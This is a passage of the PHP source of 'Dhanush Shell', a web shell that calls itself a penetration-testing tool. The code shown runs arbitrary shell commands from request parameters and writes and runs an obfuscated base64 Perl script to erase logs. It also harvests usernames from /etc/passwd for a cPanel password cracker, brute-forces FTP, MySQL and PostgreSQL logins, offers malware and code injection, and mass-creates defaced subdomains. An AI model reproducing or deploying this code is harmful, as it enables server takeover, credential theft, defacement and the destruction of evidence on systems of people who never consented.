4382 }
4383 else if(isset($_REQUEST['subdomain']))
4384 {
4385 ?>
4386 <center><form>
4387 <table>
4388 <tr>
4389 <td>Cpanel user : </td>
4390 <td><input type="text" name="cpaneluser" value="<?php echo get_current_user(); ?>" class="box" /></td>
4391 </tr>
4392 <tr>
4393 <td>Cpanel password : </td>
4394 <td><input type="password" name="cpanelpass" class="box" /></td>
4395 </tr>
4396 <tr>
4397 <td>Number of Subdomain : </td>
4398 <td><input type="text" name="noofsubdomain" class="box" value="10" /></td>
4399 </tr>
4400 <tr>
4401 <td valign="top">Index : </td>
4402 <td><textarea rows="7" cols="54" name="subindex" class="box">You just got Hacked</textarea></td>
4403 </tr>
4404 <tr>
4405 <td></td>
4406 <td><input type="button" value=" go " class="but" onClick="createsubdomain(cpaneluser.value,cpanelpass.value,noofsubdomain.value,subindex.value)" /></td>
4407 </tr>
4408 </table></center></form><br>
4409 <div id="showmydata"></div>
4410 <?php
4411 }
4412 else if(isset($_REQUEST['404']))
4413 {
4414 ?>
4415 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font size="4">| Set Your 404 Page |</font></a></td>
4416 <td><a href=javascript:void(0) onClick="getdata('404page')"><font size="4">| Set Specified 404 Page |</font></a></td>
4417 </tr></table></center><br>
4418 <div id="showdata"></div>
4419 <?php
4420 }
4421 else if(isset($_REQUEST['malattack']))
4422 {
4423 ?>
4424 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
4425 <center><table><tr><td><a href=# onClick="getdata('malware')"><font size="4">| Malware Attack |</font></a></td>
4426 <td><a href=# onClick="getdata('codeinsert')"><font size="4">| Insert Own Code |</font></a></td></tr></table></center><br><div id="showdata"></div>
4427 <?php
4428 }
4429 // Cpanel Cracker
4430 else if(isset($_REQUEST['cpanel']))
4431 {
4432 $cpanel_port="2082";
4433 $connect_timeout=5;
4434 ?>
4435 <center>
4436 <form method=post>
4437 <table style="width:50%;" class="tbl" border=1 cellpadding=4>
4438 <tr>
4439 <td align=center>User names</td><td align=center>Password</td>
4440 </tr>
4441 <tr>
4442 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
4443 if($os != "Windows")
4444 {
4445 if(@file('/etc/passwd'))
4446 {
4447 $users = file('/etc/passwd');
4448 foreach($users as $user)
4449 {
4450 $user = explode(':', $user);
4451 echo $user[0] . "
4452 ";
4453 }
4454 }
4455 else
4456 {
4457 $temp = "";
4458 $val1 = 0;
4459 $val2 = 1000;
4460 for(;$val1 <= $val2;$val1++)
4461 {
4462 $uid = @posix_getpwuid($val1);
4463 if ($uid)
4464 $temp .= join(':',$uid)."
4465 ";
4466 }
4467
4468 $temp = trim($temp);
4469
4470 if($file5 = fopen("test.txt","w"))
4471 {
4472 fputs($file5,$temp);
4473 fclose($file5);
4474
4475 $file = fopen("test.txt", "r");
4476 while(!feof($file))
4477 {
4478 $s = fgets($file);
4479 $matches = array();
4480 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4481 $matches = str_replace("home/","",$matches[1]);
4482 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4483 continue;
4484 echo $matches;
4485 }
4486 fclose($file);
4487 }
4488 }
4489 }
4490 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
4491 </tr>
4492 <tr>
4493 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
4494 </tr>
4495 </table>
4496 </form>
4497 </center>
4498 <?php
4499 }
4500 else if(isset($_GET['about']))
4501 { ?>
4502 <bR><center>
4503 <p><font size=6><u>D h a n u s h</u></font><br>
4504 <font size=5>[--==Coded By Arjun==--]</font><br>
4505 <br><div style='font-family: Courier New; font-size: 10px;'><b><pre>
4506
4507 - -- -
4508 -- -- --
4509 -- --
4510 --- ---
4511 ------
4512
4513 ----
4514 ----
4515 ------
4516 -------
4517 --- --
4518 -- ---
4519 -- -----
4520 --- --- ---
4521 --- --- ---
4522 -- --------- --
4523 -- ------- --
4524 -- ---- --
4525 -- --- --
4526 -- -- --
4527 --- --- -- ---
4528 ------ ------
4529 ---- ----
4530
4531
4532 </pre></b></div></center>
4533 Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server. The developer of the script is not responsible for any damage or misuse of it.<br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
4534 <?php }
4535 else if(isset($_GET["com"]))
4536 {
4537 echo "<br>";
4538 ob_start();
4539 eval("phpinfo();");
4540 $b = ob_get_contents();
4541 ob_end_clean();
4542 $a = strpos($b,"<body>")+6;
4543 $z = strpos($b,"</body>");
4544 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
4545 echo $s_result;
4546 }
4547 else if(isset($_GET['execute']))
4548 {
4549 $comm = $_GET['execute'];
4550 chdir($_GET['executepath']);
4551 $check = shell_exec($comm);
4552
4553 echo "<BR><center><textarea id=showexecute cols=100 rows=20 class=box>" . $check . "</textarea></center>";
4554
4555 ?>
4556 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
4557 <input type="text" class="box" name="execute">
4558 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but">
4559 <input type="button" onClick="cancel()" value="cancel" class="but" /></form></center><BR>
4560 <?php
4561 }
4562 else if(isset($_POST['mycmd']))
4563 {
4564 if($_POST['mycmd']=="logeraser")
4565 {
4566 $erase = gzinflate(base64_decode("xVhtb9s2EP6cAv0PXJIBDdZaLfbR27B27boAKVLUwNCtKwqaomwhlKiQVB0vyH8fX/RCUu+usviLRfL48O6eO/LIk+9yzoJ1nAYZZuTxoxPwnu4wwyF4tQfnhOT/vqCp6n5Hw1D2rvfgNxr+yP4GEWXl52qLiZwLzA9taZI9OaUc/AxOX354++en55/Plo8fVQLVL460GL4Gx0nM0fHZLTg5j4D6BmKf4fApCCkQWywXI4Tu4nQDYBoCLiATYM0gusKCe7gZi1MBjj/98FnjrDDBSOBwsVj8kx4vpYAnzwnGGXixbIf5SbBfJNQF3XBwQRGskcbBnELphTwlcXoFflUK9WpwdHTkDSoXwTNwa5mldVnlCGHOo5yQPXgtbbRMvNNAmHBszXv2+Q1jlJlhl4a7AW5ohtM1D0t6iuYcDJVQHkmTGGpnZzTPp2uLoEKf0bOVk9aSnQnkgNnpiRjGFj1Fcw56SqhvzKFvZQhZDBUqjZ+tHIUOSiAwH0UhXscwLRl6rVtzEGRw7yF9RjITWswYXaYREx5GzIzM8Jzjkhf1PQcrGufBOMEWJ0qTSZsZfuhM4ZRAFvOKEtOchZUC6sGIiWxijDLL8akSTTtmZieGwCTLSlp0Yw5SLjTQg1GysSjRNi1HZ8rmkExRk+ejRFbpWyhKTkxrDlI+yDr/Dwl1Eaf5TfAOInC5Ah8fjqWtxZKxckLebP+PI6b46k8g5c0qgVRjlgTSQPdSoI1kJ7ZzSGmz7LveKIfE0yi5A4MF89HRXSsDPiHOwZ/S+phRjcPpsIxZ5alMlv5U6XLlJDo6QU6JUwBIw5ZtbiD3nxdtGdHDCIyr9JCf38CG48mX8c0QHffOSGIxIk1r5SM5kI+DNqpBLmJWk6G+x7PR7cFzNkzF/fKQWjwoq5YdTkgf5lri/07eqQcsubqxN6YptxS+7ZhVjuvXJmnwk+MACxRshcjCgEhTAqgtWcjv46egMYqVzmawY+YXPejq3w7zpYBRb4xE2kACmEG0xU20LhkLxl+wD3QxDFqKfIVKZFMK9JnoiTomtsJ0rNG+/oiFGyvudrsOk6qRpibupO4VPQgteGYJjgpicKLTh0bgMsPpq9VrsNpzgROza1fBXAGVb3Amci01HAe5GlqGnDkaTdTwd4bxCA3LZzGtYR1hPbkCeuRm0r14VBpQvXgwqnzbEbGgL2QrNF/oGefEFmwXsNbxDNYqT7F5la/egKIC7rdbP8k4VhsGWmKqHpyJmVX58NCmon0Cla8CtaJduyVoDs+kbHEh7/emuf5rLWkmAt1s7CigMdixjUzWsbifPgX11bRf3+JqPCP/A1Vtn/amDOpXWJdcdRSESbD6a3Vx+bZmXnbx3IkF2ZOLJGt03PibO7AEdv6MnZlh9RDIhfJJ+wHMM0pJQDTD7jTZlT2TLuT19hevA8RoGnSeOHoi3cSpjyYDHQmnJ9Sad4EocekgF60c/Pg84RvuoCEG+Tb4miDKcDeqkcpTVRtPD2AVAYDLCHjpBYC3D6grgkt+0/oGb6HfcV3MaQnOvhCSFqq4b+teUypamPM8VNJbVIRVSKoGxyhnsdiXMdUK5QhGMCY41CQqlDrikusc5zjge67z0zVzNB3FKaKv7IaQwQK7Ysm8GTg8JXIvgRvshhZEysltfS3m95PzlZJw4XfuWhKhJctvDtop/MwMIM+yrHG8FzR0T1dC7y/fN8qCXGw7Ur0bqjhNSMbl4RfWeEU/wzI0uOBd214ZojUjHEaBcwSojowyETQq3iIEJkSXU554MXTrHh7m+cw9pqpMsbwmMEmxqC1neVoQ2ut/nVRYXQKYzORgccW3X7YxF5TtNZTpXUO7uxXQEpS4uXCU29kJPxCbteL+blGg2YHRF5xVHdRWGnnltzPSCtkhC5y7mmv1TYTZcAaU+0PgzM0YjVS5UWAsCN5AtB+AKiYtqoVbxrpvlB6YX+74pRAPA1m5jwQywguvslLsJnIzLyquAZxrJeruMIlU0e2ByRoOhbySUbvV4vvEmoyuytlVNH9UWxFVZ86Q42nmuyjFO76AxFNYHVOYDaCpqQ2snl6zzCCkkUXSnA4YyXXHSEpFjPCYNXiOrtqB9MggkDnI7Yw3PToOudfpbthFF7oaTuHqEUPoKG/Et93dbzPSWape1VRAiRvPt0hEMudMwdsLpCLNf0dplBfyX3/+Bw=="));
4567 if(is_writable("."))
4568 {
4569 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
4570 {
4571 fwrite($openp, $erase);
4572 fclose($openp);
4573 passthru("perl logseraser.pl linux");
4574 unlink("logseraser.pl");
4575 echo "<center><font color=#FFFFFF >Logs Cleared</font></center>";
4576 }
4577 } else
4578 {
4579 if($openp = fopen("/tmp/logseraser.pl", 'w'))
4580 {
4581 fwrite($openp, $erase)or die("Error");
4582 fclose($openp);
4583 $aidx = passthru("perl logseraser.pl linux");
4584 unlink("logseraser.pl");
4585 echo "<center><font color=#FFFFFF >Logs Cleared</font></center>";
4586 }
4587 }
4588 }
4589 else
4590 {
4591 $check = shell_exec($_POST['mycmd']);
4592 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
4593 }
4594 }
4595 else if(isset($_GET['prototype']))
4596 {
4597 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
4598 if( $_GET['prototype'] == 'ftp' )
4599 {
4600 function BruteFun($ip,$port,$login,$pass)
4601 {
4602 $fp = @ftp_connect($ip, $port?$port:21);
4603 if(!$fp) return false;
4604 $res = @ftp_login($fp, $login, $pass);
4605 @ftp_close($fp);
4606 return $res;
4607 }
4608 }
4609 elseif( $_GET['prototype'] == 'mysql' )
4610 {
4611 function BruteFun($ip,$port,$login,$pass)
4612 {
4613 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
4614 @mysql_close($res);
4615 return $res;
4616 }
4617 }
4618 elseif( $_GET['prototype'] == 'pgsql' )
4619 {
4620 function BruteFun($ip,$port,$login,$pass)
4621 {
4622 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
4623 $res = @pg_connect($str);
4624 @pg_close($res);
4625 return $res;
4626 }
4627 }
4628
4629 $success = 0;
4630 $attempts = 0;
4631 $server = explode(":", $_GET['server']);
4632 if($_GET['type'] == 1)
4633 {
4634 $temp = @file('/etc/passwd');
4635 if( is_array($temp))
4636 foreach($temp as $line)
4637 {
4638 $line = explode(":", $line);
4639 ++$attempts;
4640 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4641 {
4642 $success++;
4643 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4644 }
4645 if(@$_GET['reverse'])
4646 {
4647 $tmp = "";
4648 for($i=strlen($line[0])-1; $i>=0; --$i)
4649 $tmp .= $line[0][$i];
4650 ++$attempts;
4651 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4652 {
4653 $success++;
4654 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4655 }
4656 }
4657 }
4658 }
4659 elseif($_GET['type'] == 2)
4660 {
4661 $temp = @file($_GET['dict']);
4662 if( is_array($temp) )
4663 foreach($temp as $line)
4664 {
4665 $line = trim($line);
4666 ++$attempts;
4667 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4668 {
4669 $success++;
4670 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4671 }
4672 }
4673 }
4674 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4675 }
4676 // Execute Query
4677 else if(isset($_GET["executeit"]))
4678 {
4679 if(isset($_GET['username']) && isset($_GET['server']))
4680 {
4681 $dbserver = $_GET['server'];
4682 $dbuser = $_GET['username'];
4683 $dbpass = $_GET['password'];
4684 if(mysql_connect($dbserver,$dbuser,$dbpass))
4685 {
4686 setcookie("dbserver", $dbserver);
4687 setcookie("dbuser", $dbuser);
4688 setcookie("dbpass", $dbpass);
4689 listdatabase();
4690 }
4691 else
4692 echo "cannotconnect";
4693 }
4694 }
4695 else if(isset($_GET['action']) && isset($_GET['dbname']))
4696 {
4697 if($_GET['action'] == "createDB")
4698 {
4699 $dbname = $_GET['dbname'];
4700 $dbserver = $_COOKIE["dbserver"];
4701 $dbuser = $_COOKIE["dbuser"];
4702 $dbpass = $_COOKIE["dbpass"];
4703 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4704 mysql_query("create database $dbname",$mysqlHandle);
4705 listdatabase();
4706 }
4707 if($_GET['action'] == 'dropDB')
4708 {
4709 $dbname = $_GET['dbname'];
4710 $dbserver = $_COOKIE["dbserver"];
4711 $dbuser = $_COOKIE["dbuser"];
4712 $dbpass = $_COOKIE["dbpass"];
4713 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4714 mysql_query("drop database $dbname",$mysqlHandle);
4715 mysql_close($mysqlHandle);
4716 listdatabase();
4717 }
4718 if($_GET['action'] == 'listTables')
4719 {
4720 listtable();
4721 }
4722
4723 // Create Tables
4724 if($_GET['action'] == "createtable")
4725 {
4726 $dbserver = $_COOKIE["dbserver"];
4727 $dbuser = $_COOKIE["dbuser"];
4728 $dbpass = $_COOKIE["dbpass"];
4729 $dbname = $_GET['dbname'];
4730 $tablename = $_GET['tablename'];
4731 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4732 mysql_select_db($dbname);
4733 mysql_query("CREATE TABLE $tablename ( no INT )");
4734 listtable();
4735 }
4736
4737 // Drop Tables
4738
4739 if($_GET['action'] == "dropTable")
4740 {
4741 $dbserver = $_COOKIE["dbserver"];
4742 $dbuser = $_COOKIE["dbuser"];
4743 $dbpass = $_COOKIE["dbpass"];
4744 $dbname = $_GET['dbname'];
4745 $tablename = $_GET['tablename'];
4746 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4747 mysql_select_db($dbname);
4748 mysql_query("drop table $tablename");
4749 listtable();
4750 }
4751
4752 // Empty Tables
4753 if($_GET['action'] == "empty")
4754 {
4755 $dbserver = $_COOKIE["dbserver"];
4756 $dbuser = $_COOKIE["dbuser"];
4757 $dbpass = $_COOKIE["dbpass"];
4758 $dbname = $_GET['dbname'];
4759 $tablename = $_GET['tablename'];
4760 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4761 mysql_select_db($dbname);
4762 mysql_query("delete from $tablename");
4763 listtable();
4764 }
4765
4766 // Empty Tables
4767 if($_GET['action'] == "dropField")
4768 {
4769 $dbserver = $_COOKIE["dbserver"];
4770 $dbuser = $_COOKIE["dbuser"];
4771 $dbpass = $_COOKIE["dbpass"];
4772 $dbname = $_GET['dbname'];
4773 $tablename = $_GET['tablename'];
4774 $fieldname = $_GET['fieldname'];
4775 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4776 mysql_select_db($dbname);
4777 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
4778 mysql_select_db( $dbname, $mysqlHandle );
4779 mysql_query( $queryStr , $mysqlHandle );
4780 listtable();
4781 }
4782
4783 if($_GET['action'] == 'viewdb')
4784 {
4785 listdatabase();
4786 }
4787
4788 // View Table Schema
4789 if($_GET['action'] == "viewSchema")
4790 {
4791 $dbserver = $_COOKIE["dbserver"];
4792 $dbuser = $_COOKIE["dbuser"];
4793 $dbpass = $_COOKIE["dbpass"];
4794 $dbname = $_GET['dbname'];
4795 $tablename = $_GET['tablename'];
4796 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4797 mysql_select_db($dbname);
4798 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4799 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4800 $num = mysql_num_rows( $pResult );
4801 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4802 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4803 for( $i = 0; $i < $num; $i++ )
4804 {
4805 $field = mysql_fetch_array( $pResult );
4806 echo "<tr>
4807 ";
4808 echo "<td>".$field["Field"]."</td>
4809 ";
4810 echo "<td>".$field["Type"]."</td>
4811 ";
4812 echo "<td>".$field["Null"]."</td>
4813 ";
4814 echo "<td>".$field["Key"]."</td>
4815 ";
4816 echo "<td>".$field["Default"]."</td>
4817 ";
4818 echo "<td>".$field["Extra"]."</td>
4819 ";
4820 $fieldname = $field["Field"];
4821 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>
4822 ";
4823 echo "</tr>
4824 ";
4825 }
4826 echo "</table>";
4827 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4828 }
4829
4830 // Execute Query
4831 if($_GET['action'] == "executequery")
4832 {
4833 $dbserver = $_COOKIE["dbserver"];
4834 $dbuser = $_COOKIE["dbuser"];
4835 $dbpass = $_COOKIE["dbpass"];
4836 $dbname = $_GET['dbname'];
4837 $tablename = $_GET['tablename'];
4838 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4839 mysql_select_db($dbname);
4840 $result = mysql_query($_GET['executemyquery']);
4841
4842 // results
4843 echo "<html>
4844 ". strtoupper($_GET['executemyquery']) . "<br>
4845 <table border =\"1\">
4846 ";
4847
4848 $count = 0;
4849 while ($row = mysql_fetch_assoc($result))
4850 {
4851 echo "<tr>
4852 ";
4853
4854 if ($count==0) // list column names
4855 {
4856 echo "<tr>
4857 ";
4858 while($key = key($row))
4859 {
4860 echo "<td><b>" . $key . "</b></td>
4861 ";
4862 next($row);
4863 }
4864 echo "</tr>
4865 ";
4866 }
4867
4868 foreach($row as $r) // list content of column names
4869 {
4870 if ($r=='') $r = '<font >NULL</font>';
4871 echo "<td><font class=txt>" . $r . "</font></td>
4872 ";
4873 }
4874 echo "</tr>
4875 ";
4876 $count++;
4877 }
4878 echo "</table>
4879 <font class=txt size=3>" . $count . " rows returned.</font>
4880 </html>";
4881 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4882 }
4883
4884 // View Table Data
4885 if($_GET['action'] == "viewdata")
4886 {
4887 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4888 $dbserver = $_COOKIE["dbserver"];
4889 $dbuser = $_COOKIE["dbuser"];
4890 $dbpass = $_COOKIE["dbpass"];
4891 $dbname = $_GET['dbname'];
4892 $tablename = $_GET['tablename'];
4893 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4894 ?>
4895 <br><br>
4896 <form>
4897 <table>
4898 <tr>
4899 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4900 </tr>
4901 <tr>
4902 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4903 </tr>
4904 </table>
4905 </form>
4906 <?php
4907 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4908 mysql_select_db($dbname);
4909
4910 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4911 $row = mysql_fetch_array($sql);
4912 $rowid = $row['COLUMN_NAME'];
4913
4914 echo "<br><font size=4>Data in Table</font><br>";
4915 if( $tablename != "" )
4916 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4917 else
4918 echo "<font size=3 class=txt>$dbname</font><br>";
4919
4920 $queryStr = "";
4921 $pag = 0;
4922 $queryStr = stripslashes( $queryStr );
4923 if( $queryStr == "" )
4924 {
4925 if(isset($_REQUEST['page']))
4926 {
4927 $res = mysql_query("select * from $tablename");
4928 $getres = mysql_num_rows($res);
4929 $coun = ceil($getres/30);
4930 if($_REQUEST['page'] != 1)
4931
4932 $pag = $_REQUEST['page'] * 30;
4933
4934 else
4935 $pag = $_REQUEST['page'] * 30;
4936
4937 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4938 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4939 $arrcount = 1;
4940 $arrdata[$arrcount] = 0;
4941 while($row = mysql_fetch_array($sql))
4942 {
4943 $arrdata[$arrcount] = $row[$rowid];
4944 $arrcount++;
4945 }
4946 }
4947 else
4948 {
4949 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4950 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4951 $arrcount = 1;
4952 $arrdata[$arrcount] = 0;
4953 while($row = mysql_fetch_array($sql))
4954 {
4955 $arrdata[$arrcount] = $row[$rowid];
4956 $arrcount++;
4957 }
4958 }
4959 if( $orderby != "" )
4960 $queryStr .= " ORDER BY $orderby";
4961 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>
4962 ";
4963 }
4964
4965
4966 $pResult = mysql_query($queryStr );
4967 $fieldt = mysql_fetch_field($pResult);
4968 $tablename = $fieldt->table;
4969 $errMsg = mysql_error();
4970
4971 $GLOBALS[queryStr] = $queryStr;
4972
4973 if( $pResult == false )
4974 {
4975 echoQueryResult();
4976 return;
4977 }
4978 if( $pResult == 1 )
4979 {
4980 $errMsg = "Success";
4981 echoQueryResult();
4982 return;
4983 }
4984
4985 echo "<hr color='#1B1B1B'>
4986 ";
4987
4988 $row = mysql_num_rows( $pResult );
4989 $col = mysql_num_fields( $pResult );
4990
4991 if( $row == 0 )
4992 {
4993 echo "<font size=3>No Data Exist!</font>";
4994 return;
4995 }
4996
4997 if( $rowperpage == "" ) $rowperpage = 30;
4998 if( $page == "" ) $page = 0;
4999 else $page--;
5000 mysql_data_seek( $pResult, $page * $rowperpage );
5001
5002 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>
5003 ";
5004 echo "<tr>
5005 ";
5006 for( $i = 0; $i < $col; $i++ )
5007 {
5008 $field = mysql_fetch_field( $pResult, $i );
5009 echo "<th>";
5010 if($action == "viewdata")
5011 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>
5012 ";
5013 else
5014 echo $field->name."
5015 ";
5016 echo "</th>
5017 ";
5018 }
5019 echo "<th colspan=2>Action</th>
5020 ";
5021 echo "</tr>
5022 ";
5023 $num=1;
5024
5025
5026 $acount = 1;
5027
5028 for( $i = 0; $i < $rowperpage; $i++ )
5029 {
5030 $rowArray = mysql_fetch_row( $pResult );
5031 if( $rowArray == false ) break;
5032 echo "<tr>
5033 ";
5034 $key = "";
5035 for( $j = 0; $j < $col; $j++ )
5036 {
5037 $data = $rowArray[$j];
5038
5039 $field = mysql_fetch_field( $pResult, $j );
5040 if( $field->primary_key == 1 )
5041 $key .= "&" . $field->name . "=" . $data;
5042
5043 if( strlen( $data ) > 30 )
5044 $data = substr( $data, 0, 30 ) . "...";
5045 $data = htmlspecialchars( $data );
5046 echo "<td>
5047 ";
5048 echo "<font class=txt>$data</font>
5049 ";
5050 echo "</td>
5051 ";
5052 }
5053
5054 if(!is_numeric($arrdata[$acount]))
5055 echo "<td colspan=2>No Key</td>
5056 ";
5057 else
5058 {
5059 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>
5060 ";
5061 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>
5062 ";
5063 $acount++;
5064 }
5065 }
5066 echo "</tr>
5067 ";
5068
5069
5070 echo "</table>";
5071 if($arrcount > 30)
5072 {
5073 $res = mysql_query("select * from $tablename");
5074 $getres = mysql_num_rows($res);
5075 $coun = ceil($getres/30);
5076 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
5077 for($i=0;$i<$coun;$i++)
5078 echo "<option value=$i>$i</option>";
5079
5080 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
5081 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5082 }
5083 }
5084
5085 // Delete Table Data
5086 if($_GET['action'] == "deleteData")
5087 {
5088 $dbserver = $_COOKIE["dbserver"];
5089 $dbuser = $_COOKIE["dbuser"];
5090 $dbpass = $_COOKIE["dbpass"];
5091 $dbname = $_GET['dbname'];
5092 $tablename = $_GET['tablename'];
5093 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5094 mysql_select_db($dbname);
5095 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5096 $row = mysql_fetch_array($sql);
5097 $row = $row['COLUMN_NAME'];
5098 $rowid = $_GET[$row];
5099 mysql_query("delete from $tablename where $row = '$rowid'");
5100 listtable();
5101 }
5102 // Edit Table Data
5103 if($_GET['action'] == "editData")
5104 {
5105 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
5106 $dbserver = $_COOKIE["dbserver"];
5107 $dbuser = $_COOKIE["dbuser"];
5108 $dbpass = $_COOKIE["dbpass"];
5109 $dbname = $_GET['dbname'];
5110 $tablename = $_GET['tablename'];
5111 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5112 ?>
5113 <br><br>
5114 <form action="<?php echo $self; ?>" method="post">
5115 <?php
5116 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5117 mysql_select_db($dbname);
5118
5119 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
